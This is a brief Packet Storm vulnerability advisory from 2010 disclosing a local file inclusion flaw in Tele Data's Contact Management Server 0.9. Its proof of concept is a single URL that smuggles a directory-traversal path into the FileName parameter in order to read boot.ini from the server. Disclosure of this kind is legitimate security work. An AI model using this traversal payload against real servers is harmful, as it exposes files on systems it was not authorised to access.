TeleData CMS 0.9 Local File Inclusion

2010-05-25T00:00:00
ID PACKETSTORM:89887
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-25T00:00:00

Description

                                        
                                            `#============================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Local File Inclusion #  
# Software.................Tele Data's Contact Management Server 0.9 #  
# Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe #  
# Date.....................5/23/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# A local file inclusion vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to read #  
# files from the server file system. #  
# #  
# #  
# ##Proof of Concept## #  
# #  
# Login as an administrator and navigate to #  
# http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini #  
# #  
#============================================================================================================#  
`